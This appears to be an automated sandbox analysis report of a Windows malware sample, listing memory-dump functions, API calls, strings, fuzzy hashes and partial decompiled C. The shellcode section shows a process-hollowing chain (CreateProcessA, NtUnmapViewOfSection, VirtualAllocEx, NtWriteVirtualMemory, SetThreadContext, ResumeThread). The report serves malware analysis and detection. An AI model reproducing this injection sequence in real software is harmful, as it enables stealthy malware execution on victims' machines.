Puvehocusegaw nomexu dawovegubiteyeg lifezeri baju, xrefs: 00401848
runexobozez, xrefs: 00401854

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: Console$Name$ComputerCreateTitle$AliasAliasesAllocAllocateAtomAttributesCommCompletionConfigDefaultEnumFileFindHandleHeapLocalLocalesModulePortQueryResourceSystemThreadVersionVirtual__calloc_impl__wfopen_s_calloc_fseek_malloc_printf
String ID: 0.txt$5k$$Puvehocusegaw nomexu dawovegubiteyeg lifezeri baju$Zeyu tuvu vegud rayuz$cimojudozuwelam$fofako$kernel32.dll$runexobozez$vofazegekasu
API String ID: 695303298-2252213788
Opcode ID: d76fe2ba655ade79a68aae28beea205a63fe07c1f4d559ddfa92563484d41ad4
Instruction ID: 54d307ccdfca2d1b4b0510a70eb04f4b788bdad6c4ccd1e559149aed047bff3f
Opcode Fuzzy Hash: d76fe2ba655ade79a68aae28beea205a63fe07c1f4d559ddfa92563484d41ad4
Instruction Fuzzy Hash: 175180B1504340AFD310AFA5DCC9E9ABBECEB48319F10993FF556A21A1D63C9940CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00530110, Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00530156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0053016C
CreateProcessA.KERNELBASE(?,00000000), ref: 00530255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00530270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00530283
GetThreadContext.KERNELBASE(00000000,?), ref: 0053029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005302C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 005302E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00530304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0053032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00530399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005303BF
SetThreadContext.KERNELBASE(00000000,?), ref: 005303E1
ResumeThread.KERNELBASE(00000000), ref: 005303ED
ExitProcess.KERNEL32(00000000), ref: 00530412

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: a7548f494b9b63a109ef92b17c0d5ca4ab60a15208d9ca97040492f6881f8c89
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: CAB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00530630, Relevance: 58.4, APIs: 1, Strings: 32, Instructions: 671
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(user32), ref: 005306E2

Strings

CloseHandle, xrefs: 00530938, 0053093E
VirtualProtectEx, xrefs: 005314E9, 005314EF
ExitProcess, xrefs: 00531554, 0053155A
RegisterClassExA, xrefs: 005311B7, 005311BD
CreateFileA, xrefs: 0053088B, 00530891
GetModuleFileNameA, xrefs: 00530EFB, 00530EFE
WaitForSingleObject, xrefs: 00530E95, 00530E9B
PostMessageA, xrefs: 005312B0, 005312B6
user32, xrefs: 005306DB, 005306E1
CreateProcessA, xrefs: 005309BB, 005309C1
GetMessageExtraInfo, xrefs: 00530794, 0053079A
VirtualAllocEx, xrefs: 00530B44, 00530B4A
ResumeThread, xrefs: 00530DEF, 00530DF5
GetFileAttributesA, xrefs: 005313D7, 005313DA
ntdll.dll, xrefs: 00530FE2, 00530FE8
GetThreadContext, xrefs: 00530A4C, 00530A52
NtUnmapViewOfSection, xrefs: 00531085, 0053108B
WinExec, xrefs: 00530820, 00530823
SetThreadContext, xrefs: 00530D7A, 00530D80
VirtualAlloc, xrefs: 00530AC1, 00530AC7
VirtualFree, xrefs: 00530BB2, 00530BB8
WriteFile, xrefs: 005308CD, 005308D0
CreateWindowExA, xrefs: 0053123E, 00531244
NtWriteVirtualMemory, xrefs: 0053112C, 00531132
DefWindowProcA, xrefs: 00531374, 0053137A
WriteProcessMemory, xrefs: 00530CE9, 00530CEF
kernel32, xrefs: 005307ED, 005307F3
ReadProcessMemory, xrefs: 00530C4A, 00530C50
GetStartupInfoA, xrefs: 0053145B, 00531461
MessageBoxA, xrefs: 005306EE, 005306F4
GetMessageA, xrefs: 005312F7, 005312FA
GetCommandLineA, xrefs: 00530F82, 00530F88

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID: LibraryLoad
String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
API String ID: 1029625771-3105132389
Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
Instruction ID: 231beef21dfb0857733ca3ef16a17de3c3fdde8042bb66bc92f5ef8f69491c9b
Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
Instruction Fuzzy Hash: D7A25460D0C6E9C9EB21C668CC4C7DDBEB51B26749F0841D9818C66292C7BB1B98CF76

Uniqueness

Uniqueness Score: -1.00%

Function 00401A22, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00401A22(void* __ebx, void* __edx, void* __edi, void* __fp0) {
				void* _t22;
				void* _t25;
				void* _t34;

				_t34 = __fp0;
				_t23 = __edi;
				_t22 = __edx;
				_t19 = __ebx;
				E00412EA4(E00412FA8, _t25);
				if( *0x43ed0c == 0xc) {
					__imp__OpenJobObjectA(0, 0, "futefohalumiluyowemaboxogarirewemixehufiwiji");
					SetLocaleInfoA(0, 0, 0);
					E00401AB8(_t25 - 0x28, "vemetahupofutadiki");
					_push(0);
					 *((intOrPtr*)(_t25 - 4)) = 0;
					E00402F8E(__ebx, _t22, __edi, 0, 0);
					_push(0);
					E00402CB4(__ebx, _t22, __edi, 0, 0);
					_push(0);
					_push(0);
					_push(0);
					E00402E41(__ebx, _t22, __edi, 0, 0);
					_push(0);
					E004028A6(_t19, _t22, _t23, 0, 0);
					_push(0);
					E00402784();
					E0040276E(0);
					E00402D22(_t22, _t23, 0, 0);
				}
				 *0x43ed0c =  *0x421364;
				 *0x43ed0c =  *0x43ed0c + 0xb2d3b; // executed
				E004017B8(_t22, _t34); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
				return 0;
			}

0x00401a22
0x00401a22
0x00401a22
0x00401a22
0x00401a27
0x00401a36
0x00401a41
0x00401a4a
0x00401a58
0x00401a5d
0x00401a5e
0x00401a61
0x00401a66
0x00401a67
0x00401a6c
0x00401a6d
0x00401a6e
0x00401a6f
0x00401a74
0x00401a75
0x00401a7a
0x00401a7b
0x00401a81
0x00401a89
0x00401a89
0x00401a93
0x00401a9d
0x00401aa3
0x00401aad
0x00401ab5

APIs

__EH_prolog.LIBCMT ref: 00401A27
OpenJobObjectA.KERNEL32 ref: 00401A41
SetLocaleInfoA.KERNEL32 ref: 00401A4A
_ftell.LIBCMT ref: 00401A67
_fseek.LIBCMT ref: 00401A6F
_printf.LIBCMT ref: 00401A75

Part of subcall function 0040276E: __wcstoi64.LIBCMT ref: 0040277A

Part of subcall function 00402D22: __getptd.LIBCMT ref: 00402D2E
Part of subcall function 00402D22: _abort.LIBCMT ref: 00402D50

Strings

futefohalumiluyowemaboxogarirewemixehufiwiji, xrefs: 00401A38
vemetahupofutadiki, xrefs: 00401A50

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: H_prologInfoLocaleObjectOpen__getptd__wcstoi64_abort_fseek_ftell_printf
String ID: futefohalumiluyowemaboxogarirewemixehufiwiji$vemetahupofutadiki
API String ID: 1946867905-2195284033
Opcode ID: 7cd09f3f3e1c34257ae22f5955025247fa3249cdbd2d0253c28ec1fc76159874
Instruction ID: 16e6a52a9c9e353dacb53020b238a7739d1156872dd4aea7f32f695e7d621072
Opcode Fuzzy Hash: 7cd09f3f3e1c34257ae22f5955025247fa3249cdbd2d0253c28ec1fc76159874
Instruction Fuzzy Hash: 9D01E131902524A6C725BB669E4D9CF3A78AF16358B04413BF815721D1DBBC4641CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 00407B23, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00407B23(intOrPtr _a4) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				void* _t12;

				if(TlsGetValue( *0x419718) == 0) {
					L4:
					_t15 = L"KERNEL32.DLL";
					_t6 = GetModuleHandleW(L"KERNEL32.DLL");
					if(_t6 != 0) {
						L6:
						_t7 = GetProcAddress(_t6, "EncodePointer");
						L7:
						if(_t7 != 0) {
							_t9 =  *_t7(_a4); // executed
							_a4 = _t9;
						}
						L9:
						return _a4;
					}
					_t6 = E00404EBC(_t15);
					if(_t6 == 0) {
						goto L9;
					}
					goto L6;
				}
				_t10 =  *0x419714; // 0x1
				if(_t10 == 0xffffffff) {
					goto L4;
				}
				_push(_t10);
				_t12 =  *(TlsGetValue( *0x419718))();
				if(_t12 == 0) {
					goto L4;
				}
				_t7 =  *(_t12 + 0x1f8);
				goto L7;
			}

0x00407b39
0x00407b5c
0x00407b5c
0x00407b62
0x00407b6a
0x00407b77
0x00407b7d
0x00407b83
0x00407b85
0x00407b8a
0x00407b8c
0x00407b8c
0x00407b8f
0x00407b94
0x00407b94
0x00407b6d
0x00407b75
0x00000000
0x00000000
0x00000000
0x00407b75
0x00407b3b
0x00407b43
0x00000000
0x00000000
0x00407b45
0x00407b4e
0x00407b52
0x00000000
0x00000000
0x00407b54
0x00000000

APIs

TlsGetValue.KERNEL32(00000000,?,00407B9C,00000000,0040A3EE,0043B338,00000000,00000314,?,00405363,0043B338,Microsoft Visual C++ Runtime Library,00012010), ref: 00407B35
TlsGetValue.KERNEL32(00000001,?,00407B9C,00000000,0040A3EE,0043B338,00000000,00000314,?,00405363,0043B338,Microsoft Visual C++ Runtime Library,00012010), ref: 00407B4C
GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00407B9C,00000000,0040A3EE,0043B338,00000000,00000314,?,00405363,0043B338,Microsoft Visual C++ Runtime Library,00012010), ref: 00407B62
__crt_waiting_on_module_handle.LIBCMT ref: 00407B6D
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00407B7D
RtlEncodePointer.NTDLL(00000000,?,00407B9C,00000000,0040A3EE,0043B338,00000000,00000314,?,00405363,0043B338,Microsoft Visual C++ Runtime Library,00012010), ref: 00407B8A

Strings

KERNEL32.DLL, xrefs: 00407B5C, 00407B61, 00407B6C
EncodePointer, xrefs: 00407B77

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc__crt_waiting_on_module_handle
String ID: EncodePointer$KERNEL32.DLL
API String ID: 2228147409-3682587211
Opcode ID: 16d954ba6919d6e0aab0a14370627cc256620ac5a7dddbb358e2ae3475973534
Instruction ID: dcdddd62902a12002d150c8445dd889aba8dc101a9c092279b4081150dcff3fb
Opcode Fuzzy Hash: 16d954ba6919d6e0aab0a14370627cc256620ac5a7dddbb358e2ae3475973534
Instruction Fuzzy Hash: AEF01230A04116ABCB105F25DC44AEB3EA99F007A57148132E818E72E0DB39FD4186AE

Uniqueness

Uniqueness Score: -1.00%

Function 00530420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00530533

Strings

d, xrefs: 00530584
saodkfnosa9uin, xrefs: 005304DA
0, xrefs: 00530492
mfoaskdfnoa, xrefs: 00530520, 00530523

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 21a6d6f7aa8e1dbf372440fa4e73ee0528f62c8ff018d07bc1db018dee0b4dc6
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 61510670D08388DAEB11CBA8C859BDDBFB2AF11708F144058D5486F2C6C3BA5A58CB66

Uniqueness

Uniqueness Score: -1.00%

Function 005305B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 005305EC

Strings

apfHQ, xrefs: 005305E2, 005305E5
o, xrefs: 00530600

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 0cd5e6437643c95a73aead2b9169575b9dcab9d5e973f83c8fb5e351bcb19336
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: F5012170C0424CEEDF14DB98C5193AEBFB5AF41308F1480D9C4092B282D7769B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005207A6, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 005207EE

Memory Dump Source

Source File: 00000000.00000002.659970213.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_U3E7zMaux2.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ba861284fa5893b07faba6330d824de5ecbc5985226b591547a2835c267d44da
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 64F062321027216BD7203AB5A88DA6F7AE8FF4A765F141528E642910C2DA70F8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 00404E8C, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404E8C(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43b2fc = _t6;
				if(_t6 != 0) {
					 *0x441258 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00404ea1
0x00404ea7
0x00404eae
0x00404eb5
0x00404ebb
0x00404eb1
0x00404eb1
0x00404eb1

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00404EA1

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: df7efbca2bd6b9ae09174bfcef3b077ace6aeead7e5d04ed554b3c6d9070e46a
Instruction ID: ee68a1a5e9dbb361eb25ebd9e366cb7d26e6104cd2a32fe7e4540a47e3f35f8d
Opcode Fuzzy Hash: df7efbca2bd6b9ae09174bfcef3b077ace6aeead7e5d04ed554b3c6d9070e46a
Instruction Fuzzy Hash: AED05E769903459ADB109F76AC08B673BECE784795F1084B6FA0DC62A0E6B4C5808A88

Uniqueness

Uniqueness Score: -1.00%

Function 00520465, Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005204B6

Memory Dump Source

Source File: 00000000.00000002.659970213.0000000000520000.00000040.00000001.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_U3E7zMaux2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 39dbc72f5874e974593d6cb4f1b6f536f3c4592b293bf575af544f17c25ff964
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 87112D79A40208EFDB01DF98C985E98BFF5AF09350F058094F9489B3A2D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0040179D, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040179D() {
				void* _t1;

				_t1 = VirtualAlloc(0,  *0x43ed0c, 0x1000, 0x40); // executed
				 *0x43e7f8 = _t1;
				return _t1;
			}

0x004017ac
0x004017b2
0x004017b7

APIs

VirtualAlloc.KERNELBASE(00000000,00001000,00000040,0040192D), ref: 004017AC

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 302b43764634bcc051fd318fd8ffcac5d35457651d257a9b59deaed6fb1fd2b9
Instruction ID: db7c73613e8fd6e3df277f86c25ad9f3f8aa483499067674ded12378bef999be
Opcode Fuzzy Hash: 302b43764634bcc051fd318fd8ffcac5d35457651d257a9b59deaed6fb1fd2b9
Instruction Fuzzy Hash: 6CB092B4282201AAF6110F52AC0AF803BA0A308B43F116021B314681E8C7B410549A0C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040383B, Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040383B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x419680; // 0x2dffc266
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43b898 = _t6;
				 *0x43b894 = _t22;
				 *0x43b890 = _t25;
				 *0x43b88c = _t21;
				 *0x43b888 = _t27;
				 *0x43b884 = _t26;
				 *0x43b8b0 = ss;
				 *0x43b8a4 = cs;
				 *0x43b880 = ds;
				 *0x43b87c = es;
				 *0x43b878 = fs;
				 *0x43b874 = gs;
				asm("pushfd");
				_pop( *0x43b8a8);
				 *0x43b89c =  *_t31;
				 *0x43b8a0 = _v0;
				 *0x43b8ac =  &_a4;
				 *0x43b7e8 = 0x10001;
				_t11 =  *0x43b8a0; // 0x0
				 *0x43b79c = _t11;
				 *0x43b790 = 0xc0000409;
				 *0x43b794 = 1;
				_t12 =  *0x419680; // 0x2dffc266
				_v812 = _t12;
				_t13 =  *0x419684; // 0xd2003d99
				_v808 = _t13;
				 *0x43b7e0 = IsDebuggerPresent();
				_push(1);
				E00409EDC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41447c);
				if( *0x43b7e0 == 0) {
					_push(1);
					E00409EDC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040383b
0x0040383b
0x0040383b
0x0040383b
0x0040383b
0x0040383b
0x0040383b
0x00403841
0x00403843
0x00403843
0x00409c77
0x00409c7c
0x00409c82
0x00409c88
0x00409c8e
0x00409c94
0x00409c9a
0x00409ca1
0x00409ca8
0x00409caf
0x00409cb6
0x00409cbd
0x00409cc4
0x00409cc5
0x00409cce
0x00409cd6
0x00409cde
0x00409ce9
0x00409cf3
0x00409cf8
0x00409cfd
0x00409d07
0x00409d11
0x00409d16
0x00409d1c
0x00409d21
0x00409d2d
0x00409d32
0x00409d34
0x00409d3c
0x00409d47
0x00409d54
0x00409d56
0x00409d58
0x00409d5d
0x00409d71

APIs

IsDebuggerPresent.KERNEL32 ref: 00409D27
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409D3C
UnhandledExceptionFilter.KERNEL32(0041447C), ref: 00409D47
GetCurrentProcess.KERNEL32(C0000409), ref: 00409D63
TerminateProcess.KERNEL32(00000000), ref: 00409D6A

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 72a7f3b416c0b8e8335f84ed00f1e2132159a32adc1db1a36f5458b1f53fc952
Instruction ID: 8c32a89dde0f2638a54074bb8c52f61136f4877dc6c59b12ca64c844646a19bc
Opcode Fuzzy Hash: 72a7f3b416c0b8e8335f84ed00f1e2132159a32adc1db1a36f5458b1f53fc952
Instruction Fuzzy Hash: DA21CEB4800208DFDB08EF29FC467947BE8FB88355F14603AE648972A1E7B45980CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408848, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408848() {

				SetUnhandledExceptionFilter(E00408806);
				return 0;
			}

0x0040884d
0x00408855

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00008806), ref: 0040884D

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3c3d8102e4c6d0416ba8b382d20b6b7ffe680a63592c4c696caf3675593dec86
Instruction ID: be0820b7984d20990d13a60361a7acd4060f09957eae44c8a91a079c8c0dff8d
Opcode Fuzzy Hash: 3c3d8102e4c6d0416ba8b382d20b6b7ffe680a63592c4c696caf3675593dec86
Instruction Fuzzy Hash: B59002A12512006AC6406B706D095453DD05A5C62379184756049E4098EE6442549929

Uniqueness

Uniqueness Score: -1.00%

Function 005331FF, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.659977483.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_U3E7zMaux2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47001169f558e7805078623876a8b3adc06a536d28c598f5f3b8a6f2b599519
Instruction ID: 9aea4f3812e51409e8e93d6b0811c28400f7799b0c13e3f639e6643821a4fbdc
